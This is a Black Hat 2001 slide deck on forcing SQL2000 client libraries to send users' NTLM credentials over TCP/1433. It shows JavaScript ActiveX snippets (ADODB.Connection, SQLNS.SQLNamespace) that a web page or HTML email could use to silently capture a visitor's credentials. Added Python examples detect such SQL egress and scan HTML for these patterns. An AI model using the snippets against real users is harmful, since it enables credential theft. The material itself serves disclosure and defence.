Grabbin’ Creds:
Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
Timothy M. Mullen
AnchorIS.Com, Inc.
thor@hammerofgod.com




Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001   1
The Culprit: SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP Sockets, encryption,
  authentication, etc.
• Default library on workstations that
  have SQL2k client utilities installed.
  (MSDE as well?)

Backgrounders…
• SQL 7 also supported TCP/IP sockets,
  but only for Mixed Mode authentication
  (SQL maintained its own accounts)
• Integrated Authentication (NTLM Creds)
  needed Named Pipes
• Named Pipes required 139/445 open to
  authenticating system.

Backgrounders… cont.
• Integrated Authentication has _always_
  been the recommended configuration.
• 139/445 has long been blocked at the
  router (if not, you are a yum-yum.)
• Many server-to-server apps
  authenticate over TCP 1433 because it
  is “safe” .

The Skinny
• DBNETLIB now directly supports
  integrated authentication over standard
  TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs
  can now be sent out via 1433 (or another
  port if the default is changed).

The Problem
• Many routers, though specifically
  blocking 139/445, still allow established
  traffic out, i.e. 1433 outbound is free to
  pass.
• Many have 1433 explicitly open for
  application support, server-to-server
  queries, etc.
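The slide's point is that 1433 egress is routinely permitted, so the first thing a defender wants to know is whether internal hosts are actually opening SQL sessions toward addresses outside the organisation. The Python below is an added example, not code from the original deck: it walks constructed connection records in an assumed `src=… dst=… dport=… proto=…` format and flags SQL-port sessions from internal hosts to external targets (the back channel the slides describe) and, at lower priority, to internal servers that are not on an assumed allow-list.

```python
"""
Added example, not from the original slides: review connection records for
outbound TCP/1433 sessions from internal hosts, the egress path the slides
describe as "free to pass" even where 139/445 are blocked. The record
format, address ranges and allow-list are constructed for this example.
"""
import ipaddress
from typing import Dict, List

# Assumed internal address space and the SQL servers that internal hosts are
# expected to reach over 1433 (server-to-server queries, application support).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
ALLOWED_SQL_SERVERS = frozenset({"10.1.1.1"})
SQL_PORTS = frozenset({1433})   # extend if servers listen on a changed port


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_record(line: str) -> Dict[str, str]:
    """Constructed key=value format: 'src=A dst=B dport=N proto=tcp'."""
    return dict(field.split("=", 1) for field in line.split())


def suspicious_sql_egress(lines: List[str]) -> List[Dict[str, str]]:
    """Return records where an internal host opens a SQL port on a host that
    is either outside the organisation or not an approved SQL server."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("proto") != "tcp" or int(rec.get("dport", "0")) not in SQL_PORTS:
            continue
        if not is_internal(rec["src"]):
            continue
        if not is_internal(rec["dst"]):
            # An NTLM challenge/response carried inside the SQL session would
            # leave the network on this connection.
            hits.append({**rec, "reason": "external SQL target"})
        elif rec["dst"] not in ALLOWED_SQL_SERVERS:
            hits.append({**rec, "reason": "internal SQL target not on allow-list"})
    return hits


SAMPLE_RECORDS = [   # constructed for this example
    "src=10.2.3.4 dst=10.1.1.1 dport=1433 proto=tcp",       # approved server
    "src=10.2.3.4 dst=203.0.113.5 dport=1433 proto=tcp",    # external target
    "src=10.2.3.4 dst=203.0.113.5 dport=443 proto=tcp",     # ordinary web traffic
    "src=10.2.3.4 dst=10.9.9.9 dport=1433 proto=tcp",       # internal, not approved
    "src=198.51.100.7 dst=203.0.113.5 dport=1433 proto=tcp", # not an internal source
]

if __name__ == "__main__":
    for hit in suspicious_sql_egress(SAMPLE_RECORDS):
        print(f'{hit["src"]} -> {hit["dst"]}:{hit["dport"]}  {hit["reason"]}')
```

Run against real flow or firewall exports, the "external SQL target" hits are the ones worth an egress rule on the router; the allow-list hits are the inventory work needed before that rule can be written without breaking legitimate server-to-server queries.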

The Sting
• Client side ODBC connections can
  specify the target server, authentication
  type, and the library to use.
• Web sites can request client to perform
  ADODB recordset requests, as well as
  other tasks.
• HTML email as well.

Somewhat Lame Example
• Web site with following tag:
{
conn=new ActiveXObject("ADODB.Connection");
// One line in the code; it is only wrapped on the slide. Integrated Security=SSPI
// asks for the logged-on user's NTLM credentials and Network Library=dbnetlib
// selects the Super Sockets lib, so the exchange rides TCP/1433.
conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();
}
Example Cont…
• User is presented with “This page is
  accessing a data source from another
  domain. Do you want to allow this?”
  dialog box.
• Easily engineered around…
Not So Lame Example
• Let's try this one:
{
ns = new ActiveXObject("SQLNS.SQLNamespace");
// Trusted_Connection=Yes requests integrated (NTLM) authentication; the
// connection string is a single line, wrapped only on the slide.
ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
}
What’s the difference?
• SQLNamespace, SQL Distribution
  Control, and SQL Merge control are all
  scriptable, and are marked _safe for
  scripting_ !
• Silently grab the creds for fun and
  profit!
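Because the controls are marked safe for scripting, the user sees no prompt; the place to catch this is content inspection of web pages and HTML mail before they reach the browser. The Python below is an added example (not code from the slides) covering both the ODBC-style and OLE DB-style connection strings the deck shows: it looks for `ActiveXObject` instantiations of the two ProgIDs that appear on the slides, parses any quoted connection string, and reports those that request integrated authentication against a host outside an assumed trusted set. The HTML samples are constructed; no ProgIDs beyond the two on the page are assumed.

```python
"""
Added example, not code from the original slides: inspect HTML (a web page
or an HTML e-mail body) for script that creates one of the scriptable SQL
client controls the slides name and hands it a connection string asking
for integrated (NTLM) authentication against a data source. Only the two
ProgIDs that appear on the slides are listed; the sample documents are
constructed for this example.
"""
import re
from typing import Dict, FrozenSet, List

# ProgIDs from the slides' own snippets. The other controls the slides
# mention (SQL Distribution Control, SQL Merge control) are not listed
# because their ProgIDs do not appear on the page.
WATCHED_PROGIDS = frozenset(p.lower() for p in ("ADODB.Connection", "SQLNS.SQLNamespace"))

PROGID_RE = re.compile(r'ActiveXObject\s*\(\s*["\']([\w.]+)["\']\s*\)', re.I)
# Any quoted string that carries a Server= or Data Source= key.
CONNSTR_RE = re.compile(r'["\']([^"\']*(?:Server|Data Source)\s*=[^"\']*)["\']', re.I)


def parse_connection_string(s: str) -> Dict[str, str]:
    """Split 'k=v;k=v' into a dict with lower-cased keys."""
    parts: Dict[str, str] = {}
    for item in s.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            parts[key.strip().lower()] = value.strip()
    return parts


def uses_integrated_auth(cs: Dict[str, str]) -> bool:
    """OLE DB spells it 'Integrated Security=SSPI', ODBC 'Trusted_Connection=Yes'."""
    return (cs.get("integrated security", "").upper() == "SSPI"
            or cs.get("trusted_connection", "").lower() == "yes")


def inspect_html(html: str, trusted_hosts: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """One finding per connection string that would hand integrated credentials
    to a host outside trusted_hosts, when a watched control is instantiated."""
    progids = [m.group(1) for m in PROGID_RE.finditer(html)]
    watched = sorted({p for p in progids if p.lower() in WATCHED_PROGIDS})
    if not watched:
        return []
    findings: List[Dict[str, str]] = []
    for m in CONNSTR_RE.finditer(html):
        cs = parse_connection_string(m.group(1))
        target = cs.get("data source") or cs.get("server") or ""
        if target and target not in trusted_hosts and uses_integrated_auth(cs):
            findings.append({
                "progids": ",".join(watched),
                "target": target,
                "netlib": cs.get("network library", ""),
            })
    return findings


# Constructed samples: the slides' two snippets wrapped in <script>, and a
# benign page that creates an unrelated control with no connection string.
SAMPLE_ADODB = """<script>
conn=new ActiveXObject("ADODB.Connection");
conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();
</script>"""

SAMPLE_SQLNS = """<script>
ns = new ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
</script>"""

SAMPLE_BENIGN = """<script>
x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "/status", false);
</script>"""

if __name__ == "__main__":
    for name, doc in (("adodb", SAMPLE_ADODB), ("sqlns", SAMPLE_SQLNS), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_html(doc))
```

The trusted-host set is what keeps this usable on an intranet whose own pages legitimately script ADO against internal servers; anything requesting SSPI or a trusted connection toward a host that is not on that list is the pattern the slides describe, regardless of which of the two connection-string dialects it uses.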
Live Demo
• Don’t try this at home! Professional
  driver on closed course.
Thanks!
AnchorIS.Com        www.anchoris.com
HammerofGod         www.hammerofgod.com

Timothy M. Mullen   tmullen@anchoris.com
                    thor@hammerofgod.com